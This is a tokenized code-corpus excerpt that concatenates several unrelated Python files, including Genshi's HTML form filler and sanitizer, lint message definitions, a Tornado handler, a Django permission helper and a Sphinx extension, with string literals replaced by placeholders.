<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : '<STR_LIT:code>' , <EOL> '<STR_LIT:index>' : '<STR_LIT:index>' , <EOL> '<STR_LIT:i>' : '<STR_LIT:index>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:t>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:target>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , } <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> any <EOL> except NameError : <EOL> from genshi . util import any <EOL> import re <EOL> from genshi . core import Attrs , QName , stripentities <EOL> from genshi . core import END , START , TEXT , COMMENT <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> __docformat__ = '<STR_LIT>' <EOL> class HTMLFormFiller ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = None , id = None , data = None , passwords = False ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . id = id <EOL> if data is None : <EOL> data = { } <EOL> self . data = data <EOL> self . passwords = passwords <EOL> def __call__ ( self , stream ) : <EOL> """<STR_LIT>""" <EOL> in_form = in_select = in_option = in_textarea = False <EOL> select_value = option_value = textarea_value = None <EOL> option_start = None <EOL> option_text = [ ] <EOL> no_option_value = False <EOL> for kind , data , pos in stream : <EOL> if kind is START : <EOL> tag , attrs = data <EOL> tagname = tag . localname <EOL> if tagname == '<STR_LIT>' and ( <EOL> self . name and attrs . get ( '<STR_LIT:name>' ) == self . name or <EOL> self . id and attrs . get ( '<STR_LIT:id>' ) == self . id or <EOL> not ( self . id or self . name ) ) : <EOL> in_form = True <EOL> elif in_form : <EOL> if tagname == '<STR_LIT:input>' : <EOL> type = attrs . get ( '<STR_LIT:type>' , '<STR_LIT>' ) . lower ( ) <EOL> if type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> name = attrs . get ( '<STR_LIT:name>' ) <EOL> if name and name in self . data : <EOL> value = self . data [ name ] <EOL> declval = attrs . get ( '<STR_LIT:value>' ) <EOL> checked = False <EOL> if isinstance ( value , ( list , tuple ) ) : <EOL> if declval is not None : <EOL> checked = declval in [ str ( v ) for v <EOL> in value ] <EOL> else : <EOL> checked = any ( value ) <EOL> else : <EOL> if declval is not None : <EOL> checked = declval == str ( value ) <EOL> elif type == '<STR_LIT>' : <EOL> checked = bool ( value ) <EOL> if checked : <EOL> attrs |= [ ( QName ( '<STR_LIT>' ) , '<STR_LIT>' ) ] <EOL> elif '<STR_LIT>' in attrs : <EOL> attrs -= '<STR_LIT>' <EOL> elif type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:text>' ) or type == '<STR_LIT:password>' and self . passwords : <EOL> name = attrs . get ( '<STR_LIT:name>' ) <EOL> if name and name in self . data : <EOL> value = self . data [ name ] <EOL> if isinstance ( value , ( list , tuple ) ) : <EOL> value = value [ <NUM_LIT:0> ] <EOL> if value is not None : <EOL> attrs |= [ <EOL> ( QName ( '<STR_LIT:value>' ) , str ( value ) ) <EOL> ] <EOL> elif tagname == '<STR_LIT>' : <EOL> name = attrs . get ( '<STR_LIT:name>' ) <EOL> if name in self . data : <EOL> select_value = self . data [ name ] <EOL> in_select = True <EOL> elif tagname == '<STR_LIT>' : <EOL> name = attrs . get ( '<STR_LIT:name>' ) <EOL> if name in self . data : <EOL> textarea_value = self . data . get ( name ) <EOL> if isinstance ( textarea_value , ( list , tuple ) ) : <EOL> textarea_value = textarea_value [ <NUM_LIT:0> ] <EOL> in_textarea = True <EOL> elif in_select and tagname == '<STR_LIT>' : <EOL> option_start = kind , data , pos <EOL> option_value = attrs . get ( '<STR_LIT:value>' ) <EOL> if option_value is None : <EOL> no_option_value = True <EOL> option_value = '<STR_LIT>' <EOL> in_option = True <EOL> continue <EOL> yield kind , ( tag , attrs ) , pos <EOL> elif in_form and kind is TEXT : <EOL> if in_select and in_option : <EOL> if no_option_value : <EOL> option_value += data <EOL> option_text . append ( ( kind , data , pos ) ) <EOL> continue <EOL> elif in_textarea : <EOL> continue <EOL> yield kind , data , pos <EOL> elif in_form and kind is END : <EOL> tagname = data . localname <EOL> if tagname == '<STR_LIT>' : <EOL> in_form = False <EOL> elif tagname == '<STR_LIT>' : <EOL> in_select = False <EOL> select_value = None <EOL> elif in_select and tagname == '<STR_LIT>' : <EOL> if isinstance ( select_value , ( tuple , list ) ) : <EOL> selected = option_value in [ str ( v ) for v <EOL> in select_value ] <EOL> else : <EOL> selected = option_value == str ( select_value ) <EOL> okind , ( tag , attrs ) , opos = option_start <EOL> if selected : <EOL> attrs |= [ ( QName ( '<STR_LIT>' ) , '<STR_LIT>' ) ] <EOL> elif '<STR_LIT>' in attrs : <EOL> attrs -= '<STR_LIT>' <EOL> yield okind , ( tag , attrs ) , opos <EOL> if option_text : <EOL> for event in option_text : <EOL> yield event <EOL> in_option = False <EOL> no_option_value = False <EOL> option_start = option_value = None <EOL> option_text = [ ] <EOL> elif in_textarea and tagname == '<STR_LIT>' : <EOL> if textarea_value : <EOL> yield TEXT , str ( textarea_value ) , pos <EOL> textarea_value = None <EOL> in_textarea = False <EOL> yield kind , data , pos <EOL> else : <EOL> yield kind , data , pos <EOL> class HTMLSanitizer ( object ) : <EOL> """<STR_LIT>""" <EOL> SAFE_TAGS = frozenset ( [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:address>' , '<STR_LIT>' , '<STR_LIT:b>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:code>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT:input>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:label>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:p>' , '<STR_LIT>' , '<STR_LIT:q>' , '<STR_LIT:s>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> SAFE_ATTRS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:class>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:label>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:size>' , <EOL> '<STR_LIT>' , '<STR_LIT:src>' , '<STR_LIT:start>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:target>' , '<STR_LIT:title>' , <EOL> '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:value>' , '<STR_LIT>' , '<STR_LIT:width>' ] ) <EOL> SAFE_CSS = frozenset ( [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:content>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:float>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:left>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:right>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:width>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] ) <EOL> SAFE_SCHEMES = frozenset ( [ '<STR_LIT:file>' , '<STR_LIT>' , '<STR_LIT:http>' , '<STR_LIT>' , '<STR_LIT>' , None ] ) <EOL> URI_ATTRS = frozenset ( [ '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:src>' ] ) <EOL> def __init__ ( self , safe_tags = SAFE_TAGS , safe_attrs = SAFE_ATTRS , <EOL> safe_schemes = SAFE_SCHEMES , uri_attrs = URI_ATTRS , <EOL> safe_css = SAFE_CSS ) : <EOL> """<STR_LIT>""" <EOL> self . safe_tags = safe_tags <EOL> self . safe_attrs = safe_attrs <EOL> self . safe_css = safe_css <EOL> self . uri_attrs = uri_attrs <EOL> self . safe_schemes = safe_schemes <EOL> _EXPRESSION_SEARCH = re . compile ( """<STR_LIT>""" , re . VERBOSE ) . search <EOL> _URL_FINDITER = re . compile ( <EOL> '<STR_LIT>' ) . finditer <EOL> def __call__ ( self , stream ) : <EOL> """<STR_LIT>""" <EOL> waiting_for = None <EOL> for kind , data , pos in stream : <EOL> if kind is START : <EOL> if waiting_for : <EOL> continue <EOL> tag , attrs = data <EOL> if not self . is_safe_elem ( tag , attrs ) : <EOL> waiting_for = tag <EOL> continue <EOL> new_attrs = [ ] <EOL> for attr , value in attrs : <EOL> value = stripentities ( value ) <EOL> if attr not in self . safe_attrs : <EOL> continue <EOL> elif attr in self . uri_attrs : <EOL> if not self . is_safe_uri ( value ) : <EOL> continue <EOL> elif attr == '<STR_LIT>' : <EOL> decls = self . sanitize_css ( value ) <EOL> if not decls : <EOL> continue <EOL> value = '<STR_LIT>' . join ( decls ) <EOL> new_attrs . append ( ( attr , value ) ) <EOL> yield kind , ( tag , Attrs ( new_attrs ) ) , pos <EOL> elif kind is END : <EOL> tag = data <EOL> if waiting_for : <EOL> if waiting_for == tag : <EOL> waiting_for = None <EOL> else : <EOL> yield kind , data , pos <EOL> elif kind is not COMMENT : <EOL> if not waiting_for : <EOL> yield kind , data , pos <EOL> def is_safe_css ( self , propname , value ) : <EOL> """<STR_LIT>""" <EOL> if propname not in self . safe_css : <EOL> return False <EOL> if propname . startswith ( '<STR_LIT>' ) and '<STR_LIT:->' in value : <EOL> return False <EOL> return True <EOL> def is_safe_elem ( self , tag , attrs ) : <EOL> """<STR_LIT>""" <EOL> if tag not in self . safe_tags : <EOL> return False <EOL> if tag . localname == '<STR_LIT:input>' : <EOL> input_type = attrs . get ( '<STR_LIT:type>' , '<STR_LIT>' ) . lower ( ) <EOL> if input_type == '<STR_LIT:password>' : <EOL> return False <EOL> return True <EOL> def is_safe_uri ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:#>' in uri : <EOL> uri = uri . split ( '<STR_LIT:#>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if '<STR_LIT::>' not in uri : <EOL> return True <EOL> chars = [ char for char in uri . split ( '<STR_LIT::>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] if char . isalnum ( ) ] <EOL> return '<STR_LIT>' . join ( chars ) . lower ( ) in self . safe_schemes <EOL> def sanitize_css ( self , text ) : <EOL> """<STR_LIT>""" <EOL> decls = [ ] <EOL> text = self . _strip_css_comments ( self . _replace_unicode_escapes ( text ) ) <EOL> for decl in text . split ( '<STR_LIT:;>' ) : <EOL> decl = decl . strip ( ) <EOL> if not decl : <EOL> continue <EOL> try : <EOL> propname , value = decl . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> continue <EOL> if not self . is_safe_css ( propname . strip ( ) . lower ( ) , value . strip ( ) ) : <EOL> continue <EOL> is_evil = False <EOL> if self . _EXPRESSION_SEARCH ( value ) : <EOL> is_evil = True <EOL> for match in self . _URL_FINDITER ( value ) : <EOL> if not self . is_safe_uri ( match . group ( <NUM_LIT:1> ) ) : <EOL> is_evil = True <EOL> break <EOL> if not is_evil : <EOL> decls . append ( decl . strip ( ) ) <EOL> return decls <EOL> _NORMALIZE_NEWLINES = re . compile ( r'<STR_LIT:\r\n>' ) . sub <EOL> _UNICODE_ESCAPE = re . compile ( <EOL> r"""<STR_LIT>""" , <EOL> re . UNICODE ) . sub <EOL> def _replace_unicode_escapes ( self , text ) : <EOL> def _repl ( match ) : <EOL> t = match . group ( <NUM_LIT:1> ) <EOL> if t : <EOL> return chr ( int ( t , <NUM_LIT:16> ) ) <EOL> t = match . group ( <NUM_LIT:2> ) <EOL> if t == '<STR_LIT:\\>' : <EOL> return r'<STR_LIT:\\>' <EOL> else : <EOL> return t <EOL> return self . _UNICODE_ESCAPE ( _repl , self . _NORMALIZE_NEWLINES ( '<STR_LIT:\n>' , text ) ) <EOL> _CSS_COMMENTS = re . compile ( r'<STR_LIT>' ) . sub <EOL> def _strip_css_comments ( self , text ) : <EOL> return self . _CSS_COMMENTS ( '<STR_LIT>' , text ) </s>
<s> def getimagesize ( url ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> from PIL import ImageFile <EOL> import urllib . request , urllib . error , urllib . parse <EOL> except ImportError : <EOL> return '<STR_LIT>' <EOL> try : <EOL> p = ImageFile . Parser ( ) <EOL> f = urllib . request . urlopen ( url ) <EOL> while True : <EOL> s = f . read ( <NUM_LIT> ) <EOL> if not s : <EOL> break <EOL> p . feed ( s ) <EOL> if p . image : <EOL> return '<STR_LIT>' % p . image . size <EOL> except ( IOError , ValueError ) : <EOL> return '<STR_LIT>' <EOL> def setup_module ( module ) : <EOL> from nose . plugins . skip import SkipTest <EOL> try : <EOL> from PIL import ImageFile <EOL> except ImportError : <EOL> raise SkipTest ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> import re <EOL> from collections import namedtuple <EOL> from pies . overrides import * <EOL> BY_CODE = { } <EOL> _ERROR_INDEX = <NUM_LIT:100> <EOL> AbstractMessageType = namedtuple ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> class MessageType ( AbstractMessageType ) : <EOL> class Message ( namedtuple ( '<STR_LIT>' , ( '<STR_LIT:message>' , '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' ) ) ) : <EOL> def __str__ ( self ) : <EOL> return self . message <EOL> def __new__ ( cls , error_code , name , template , keyword = '<STR_LIT>' ) : <EOL> global _ERROR_INDEX <EOL> new_instance = AbstractMessageType . __new__ ( cls , error_code , name , template , <EOL> keyword , _ERROR_INDEX ) <EOL> _ERROR_INDEX += <NUM_LIT:1> <EOL> BY_CODE [ error_code ] = new_instance <EOL> return new_instance <EOL> def __call__ ( self , filename , loc = None , * kargs , ** kwargs ) : <EOL> values = { '<STR_LIT:filename>' : filename , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } <EOL> if loc : <EOL> values [ '<STR_LIT>' ] = loc . lineno <EOL> values [ '<STR_LIT>' ] = getattr ( loc , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> values . update ( kwargs ) <EOL> message = self . template . format ( * kargs , ** values ) <EOL> if kwargs . get ( '<STR_LIT>' , False ) : <EOL> keyword = self . keyword . format ( * kargs , ** values ) <EOL> return self . Message ( '<STR_LIT>' . format ( filename , values [ '<STR_LIT>' ] , values [ '<STR_LIT>' ] , <EOL> self . error_code , keyword , message ) , <EOL> self , values [ '<STR_LIT>' ] , values [ '<STR_LIT>' ] ) <EOL> return self . Message ( '<STR_LIT>' . format ( filename , values [ '<STR_LIT>' ] , message ) , <EOL> self , values [ '<STR_LIT>' ] , values [ '<STR_LIT>' ] ) <EOL> class OffsetMessageType ( MessageType ) : <EOL> def __call__ ( self , filename , loc , position = None , * kargs , ** kwargs ) : <EOL> if position : <EOL> kwargs . update ( { '<STR_LIT>' : position [ <NUM_LIT:0> ] , '<STR_LIT>' : position [ <NUM_LIT:1> ] } ) <EOL> return MessageType . __call__ ( self , filename , loc , * kargs , ** kwargs ) <EOL> class SyntaxErrorType ( MessageType ) : <EOL> def __call__ ( self , filename , msg , lineno , offset , text , * kargs , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = lineno <EOL> line = text . splitlines ( ) [ - <NUM_LIT:1> ] <EOL> msg += "<STR_LIT:\n>" + str ( line ) <EOL> if offset is not None : <EOL> offset = offset - ( len ( text ) - len ( line ) ) <EOL> kwargs [ '<STR_LIT>' ] = offset <EOL> msg += "<STR_LIT:\n>" + re . sub ( r'<STR_LIT>' , '<STR_LIT:U+0020>' , line [ : offset ] ) + "<STR_LIT>" <EOL> return MessageType . __call__ ( self , filename , None , msg , * kargs , ** kwargs ) <EOL> Message = MessageType ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> UnusedImport = MessageType ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> RedefinedWhileUnused = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> RedefinedInListComp = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> ImportShadowedByLoopVar = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> ImportStarUsed = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" , '<STR_LIT:*>' ) <EOL> UndefinedName = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> DoctestSyntaxError = OffsetMessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" , '<STR_LIT>' ) <EOL> UndefinedExport = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> UndefinedLocal = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> DuplicateArgument = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> Redefined = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> LateFutureImport = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> UnusedVariable = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> MultipleValuesForArgument = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> TooFewArguments = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> TooManyArguments = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> UnexpectedArgument = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> NeedKwOnlyArgument = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> ReturnWithArgsInsideGenerator = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" , '<STR_LIT>' ) <EOL> BareExcept = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" , '<STR_LIT>' ) <EOL> FileSkipped = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" , '<STR_LIT>' ) <EOL> PythonSyntaxError = SyntaxErrorType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" , "<STR_LIT>" ) </s>
<s> import tornado . ioloop <EOL> import tornado . web <EOL> import json <EOL> class TextHandler ( tornado . web . RequestHandler ) : <EOL> def get ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> application = tornado . web . Application ( [ <EOL> ( r"<STR_LIT>" , TextHandler ) , <EOL> ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> application . listen ( <NUM_LIT> ) <EOL> tornado . ioloop . IOLoop . current ( ) . start ( ) </s>
<s> import sys <EOL> collect_ignore = [ ] <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:5> ) : <EOL> collect_ignore . append ( "<STR_LIT>" ) <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:4> ) : <EOL> collect_ignore . append ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> def _atoi ( text ) : <EOL> return int ( text ) if text . isdigit ( ) else text <EOL> def _natural_keys ( text ) : <EOL> return [ _atoi ( c ) for c in re . split ( '<STR_LIT>' , text ) ] <EOL> def nsorted ( to_sort , key = None ) : <EOL> """<STR_LIT>""" <EOL> if key is None : <EOL> key_callback = _natural_keys <EOL> else : <EOL> def key_callback ( item ) : <EOL> return _natural_keys ( key ( item ) ) <EOL> return sorted ( to_sort , key = key_callback ) </s>
<s> """<STR_LIT>""" <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . core . exceptions import PermissionDenied <EOL> def get_owned_object_or_40x ( klass , owner , include_staff = False , <EOL> include_superuser = True , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> obj = get_object_or_404 ( klass , * args , ** kwargs ) <EOL> if obj . is_not_owned_by ( owner , include_staff , include_superuser ) : <EOL> raise PermissionDenied ( ) <EOL> return obj </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import os <EOL> import re <EOL> from docutils import nodes , transforms <EOL> from sphinx import addnodes , roles , __version__ as sphinx_ver <EOL> from sphinx . builders . html import StandaloneHTMLBuilder <EOL> from sphinx . writers . html import SmartyPantsHTMLTranslator <EOL> from sphinx . util . console import bold <EOL> from sphinx . util . compat import Directive <EOL> simple_option_desc_re = re . compile ( <EOL> r'<STR_LIT>' ) <EOL> def setup ( app ) : <EOL> app . add_crossref_type ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" , <EOL> ) <EOL> app . add_crossref_type ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" <EOL> ) <EOL> app . add_crossref_type ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" <EOL> ) <EOL> app . add_crossref_type ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" , <EOL> ) <EOL> app . add_description_unit ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" , <EOL> parse_node = parse_django_admin_node , <EOL> ) <EOL> app . add_description_unit ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" , <EOL> parse_node = parse_django_adminopt_node , <EOL> ) <EOL> app . add_config_value ( '<STR_LIT>' , '<STR_LIT>' , True ) <EOL> app . add_directive ( '<STR_LIT>' , VersionDirective ) <EOL> app . add_directive ( '<STR_LIT>' , VersionDirective ) <EOL> app . add_builder ( DjangoStandaloneHTMLBuilder ) <EOL> class VersionDirective ( Directive ) : <EOL> has_content = True <EOL> required_arguments = <NUM_LIT:1> <EOL> optional_arguments = <NUM_LIT:1> <EOL> final_argument_whitespace = True <EOL> option_spec = { } <EOL> def run ( self ) : <EOL> env = self . state . document . settings . env <EOL> arg0 = self . arguments [ <NUM_LIT:0> ] <EOL> is_nextversion = env . config . django_next_version == arg0 <EOL> ret = [ ] <EOL> node = addnodes . versionmodified ( ) <EOL> ret . append ( node ) <EOL> if not is_nextversion : <EOL> if len ( self . arguments ) == <NUM_LIT:1> : <EOL> linktext = '<STR_LIT>' % ( arg0 ) <EOL> xrefs = roles . XRefRole ( ) ( '<STR_LIT>' , linktext , linktext , self . lineno , self . state ) <EOL> node . extend ( xrefs [ <NUM_LIT:0> ] ) <EOL> node [ '<STR_LIT:version>' ] = arg0 <EOL> else : <EOL> node [ '<STR_LIT:version>' ] = "<STR_LIT>" <EOL> node [ '<STR_LIT:type>' ] = self . name <EOL> if len ( self . arguments ) == <NUM_LIT:2> : <EOL> inodes , messages = self . state . inline_text ( self . arguments [ <NUM_LIT:1> ] , self . lineno + <NUM_LIT:1> ) <EOL> node . extend ( inodes ) <EOL> if self . content : <EOL> self . state . nested_parse ( self . content , self . content_offset , node ) <EOL> ret = ret + messages <EOL> env . note_versionchange ( node [ '<STR_LIT:type>' ] , node [ '<STR_LIT:version>' ] , node , self . lineno ) <EOL> return ret <EOL> class DjangoHTMLTranslator ( SmartyPantsHTMLTranslator ) : <EOL> """<STR_LIT>""" <EOL> def visit_table ( self , node ) : <EOL> self . _table_row_index = <NUM_LIT:0> <EOL> self . body . append ( self . starttag ( node , '<STR_LIT>' , CLASS = '<STR_LIT>' ) ) <EOL> def visit_desc_parameterlist ( self , node ) : <EOL> self . body . append ( '<STR_LIT:(>' ) <EOL> self . first_param = <NUM_LIT:1> <EOL> self . param_separator = node . child_text_separator <EOL> def depart_desc_parameterlist ( self , node ) : <EOL> self . body . append ( '<STR_LIT:)>' ) <EOL> if sphinx_ver < '<STR_LIT>' : <EOL> def visit_literal_block ( self , node ) : <EOL> self . no_smarty += <NUM_LIT:1> <EOL> SmartyPantsHTMLTranslator . visit_literal_block ( self , node ) <EOL> def depart_literal_block ( self , node ) : <EOL> SmartyPantsHTMLTranslator . 